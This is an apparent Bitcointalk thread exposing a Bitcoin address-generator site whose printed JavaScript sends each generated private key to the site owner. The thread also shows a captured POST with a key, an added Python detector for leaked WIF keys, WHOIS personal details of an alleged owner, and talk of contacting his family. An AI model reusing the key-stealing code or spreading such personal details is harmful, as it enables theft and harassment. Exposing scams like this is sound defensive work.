theymos (OP)
Administrator
Legendary
Offline
Activity: 5376
Merit: 13410
|
|
May 28, 2013, 02:09:17 AM |
|
Bitcoin-address.org was being spammed by JayKEy00. It's malicious, right?
|
1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD
|
|
|
OpenYourEyes
|
|
May 28, 2013, 07:12:23 PM Last edit: May 29, 2013, 12:23:02 AM by OpenYourEyes |
|
Certainly seems so. There is a JavaScript function at the bottom of the page which seems to send the public/private key off in an email:

    ...
    btcaddressEmail=document.getElementById('btcaddress'+kk).innerHTML;
    var privateKeyEmail=document.getElementById('btcprivwif'+kk).innerHTML;
    var dataToSend=new Object();
    dataToSend.btcaddressEmail=btcaddressEmail;
    dataToSend.privateKeyEmail=privateKeyEmail;
    sendToServer(dataToSend);
    })(count);
    count--;
    }
    }

    function sendToServer(dataToSend){
      $.ajax({
        url:"sendEmail.php",
        type:"post",
        data:dataToSend,
        success:function(json){
          console.log(json);
          console.log("DONE");
        },
        error:function(){
          console.log("error");
        }
      });
    }

And here are the POST headers each time a new address is generated:

    Accept:*/*
    Accept-Encoding:gzip,deflate,sdch
    Accept-Language:en-GB,en-US;q=0.8,en;q=0.6
    Connection:keep-alive
    Content-Length:118
    Content-Type:application/x-www-form-urlencoded; charset=UTF-8
    DNT:1
    Host:www.bitcoin-address.org
    Origin:http://www.bitcoin-address.org
    Referer:http://www.bitcoin-address.org/
    User-Agent:
    X-Requested-With:XMLHttpRequest

    Form Data:
    btcaddressEmail:147NH6jMB5AXBEhqF3GxyiuxAPv4MCcYHW
    privateKeyEmail:5J9snkqjAQ5sB4JSm4GnsErvmoyux7dvaM5hRpiayvkoaQm2P2U
Registrant Name:Jan Kuhn Registrant Street1:Herzbachweg 22 Registrant Street2: Registrant Street3: Registrant City:Gelnhausen Registrant State/Province: Registrant Postal Code:63571 Registrant Country:DE Registrant Phone:+49.51818553717 Registrant Phone Ext.: Registrant FAX:+49.51818553718
|
|
|
|
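Added example, not part of the original post or the site's code: a proxy- or log-side check that flags form-encoded POST bodies carrying a Bitcoin WIF private key, which is what the request captured in the post above contains. The field names are the ones from the post; the sample key and address are constructed throwaway values.

```python
import hashlib
from urllib.parse import parse_qsl

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

def _checksum(data):
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]

def b58check_encode(version, payload):
    """Base58Check-encode version byte + payload (used only to build samples)."""
    raw = bytes([version]) + payload
    raw += _checksum(raw)
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    return "1" * (len(raw) - len(raw.lstrip(b"\0"))) + out

def b58check_decode(text):
    """Return (version, payload), or None if text is not valid Base58Check."""
    n = 0
    for ch in text:
        idx = B58.find(ch)
        if idx < 0:
            return None
        n = n * 58 + idx
    pad = len(text) - len(text.lstrip("1"))
    raw = b"\0" * pad + n.to_bytes((n.bit_length() + 7) // 8, "big")
    if len(raw) < 5 or _checksum(raw[:-4]) != raw[-4:]:
        return None
    return raw[0], raw[1:-4]

def is_wif_private_key(value):
    decoded = b58check_decode(value)
    if decoded is None:
        return False
    version, payload = decoded
    # 0x80 = mainnet private key; 33 bytes = key plus 0x01 compression flag
    return version == 0x80 and (len(payload) == 32 or
                                (len(payload) == 33 and payload[-1] == 1))

def leaked_key_fields(body):
    """Names of fields in a urlencoded POST body whose value is a WIF key."""
    return [name for name, value in parse_qsl(body) if is_wif_private_key(value)]

# Constructed sample data: throwaway key and address, not taken from the thread.
SAMPLE_WIF = b58check_encode(0x80, b"\x01" * 32)
SAMPLE_ADDR = b58check_encode(0x00, b"\x02" * 20)
SAMPLE_BODY = f"btcaddressEmail={SAMPLE_ADDR}&privateKeyEmail={SAMPLE_WIF}"
```

Validating the Base58Check checksum and the 0x80 version byte keeps the check from firing on addresses or on arbitrary 51-character strings.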
jackjack
Legendary
Offline
Activity: 1176
Merit: 1280
May Bitcoin be touched by his Noodly Appendage
|
|
May 28, 2013, 08:59:02 PM |
|
I'm sure it's only for statistics
|
Own address: 19QkqAza7BHFTuoz9N8UQkryP4E9jHo4N3 - Pywallet support: 1AQDfx22pKGgXnUZFL1e4UKos3QqvRzNh5 - Bitcointalk++ script support: 1Pxeccscj1ygseTdSV1qUqQCanp2B2NMM2 Pywallet: instructions. Encrypted wallet support, export/import keys/addresses, backup wallets, export/import CSV data from/into wallet, merge wallets, delete/import addresses and transactions, recover altcoins sent to bitcoin addresses, sign/verify messages and files with Bitcoin addresses, recover deleted wallets, etc.
|
|
|
OpenYourEyes
|
|
May 29, 2013, 12:20:51 AM |
|
I'm sure it's only for statistics
Indeed. I'm sure I can find him some marketing companies that would be very interested in them. And, yet, the scammer's account and his AE/shills still remain active.
|
|
|
|
kodo
Newbie
Offline
Activity: 42
Merit: 0
|
|
May 29, 2013, 04:23:07 AM |
|
So what does the site do that's malicious?
|
|
|
|
greyhawk
|
|
May 29, 2013, 08:17:53 AM |
|
Registrant Name:Jan Kuhn Registrant Street1:Herzbachweg 22 Registrant Street2: Registrant Street3: Registrant City:Gelnhausen Registrant State/Province: Registrant Postal Code:63571 Registrant Country:DE Registrant Phone:+49.51818553717 Registrant Phone Ext.: Registrant FAX:+49.51818553718 That's an 18 year old chess talent living at home with his father who's a defense lawyer. At least he doesn't have to go very far when the crackdown cracks down.
|
|
|
|
OpenYourEyes
|
|
May 29, 2013, 01:25:33 PM |
|
So what does the site do that's malicious?
Nothing, unless you don't mind the private key being emailed to the site owner, which then gives them full access to any funds sent to one of their generated addresses.
Edit: Aha. Seems he has taken the site down. Hope it is because of a script I had in a loop which generated over 10,000 BTC addresses, bet his inbox is pretty full.
|
|
|
|
greyhawk
|
|
May 29, 2013, 01:33:35 PM |
|
And I didn't even call his father yet...
|
|
|
|
OpenYourEyes
|
|
May 29, 2013, 01:36:31 PM |
|
And I didn't even call his father yet...
Is your bio on him legit? Source? I've got a copy of the website, so I'll quite happily contact his family
|
|
|
|
greyhawk
|
|
May 29, 2013, 01:42:18 PM |
|
And I didn't even call his father yet...
Is your bio on him legit? Source?
Only as legit as the WHOIS entry. So there's always the possibility of someone having entered another one's address. In any case he deleted it now. Seems to have gotten the message. Also he's like an hour away from where I am. So there's no problem in going there to split a neighbourly piece of cake.
|
|
|
|
niko
|
|
May 31, 2013, 02:43:17 PM |
|
I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet. I know Tibanne started working on this, but not sure how far they got.
|
They're there, in their room. Your mining rig is on fire, yet you're very calm.
|
|
|
Lohoris
|
|
May 31, 2013, 03:05:31 PM |
|
I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet.
Very wrong: even if it was trademarked, scam sites could still pop up, and since they are likely already illegal anyway, they wouldn't care about the trademark and do it anyway. It's like DRM: legit business would be hurt, while criminals would be unaffected.
|
|
|
|
niko
|
|
June 01, 2013, 02:12:29 AM |
|
I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet.
Very wrong: even if it was trademarked, scam sites could still pop up, and since they are likely already illegal anyway, they wouldn't care about the trademark and do it anyway. It's like DRM: legit business would be hurt, while criminals would be unaffected.
How come there is no citi-bank.com where I would be asked to log in?
|
|
|
|
Lohoris
|
|
June 03, 2013, 08:15:55 AM |
|
How come there is no citi-bank.com where I would be asked to log in?
Are you serious?
|
|
|
|
niko
|
|
June 03, 2013, 11:15:25 AM Last edit: June 03, 2013, 11:25:31 AM by niko |
|
How come there is no citi-bank.com where I would be asked to log in?
Are you serious?
Again, none of them use a TLD with "citi" and "bank" in its name. Otherwise they wouldn't have to try all the tricks to spoof or mask the actual link. Trademarking "bitcoin" would make phishing harder and less effective, as it opens the perpetrators to additional legal risk.
|
|
|
|
escrow.ms
Legendary
Offline
Activity: 1274
Merit: 1004
|
|
June 03, 2013, 11:24:57 AM |
|
How come there is no citi-bank.com where I would be asked to log in?
Are you serious?
Again, none of them use a TLD with "citi" and "bank" in its name. Otherwise they wouldn't have to try all the tricks to spoof or mask the actual link. Trademarking "bitcoin" would make phishing harder and less effective.
Wrong, they don't do it because stealing money from banks isn't easy. Plus there are several TLDs available for registration. Take a look at this thread. https://bitcointalk.org/index.php?topic=219284.0;topicseen
|
|
|
|
|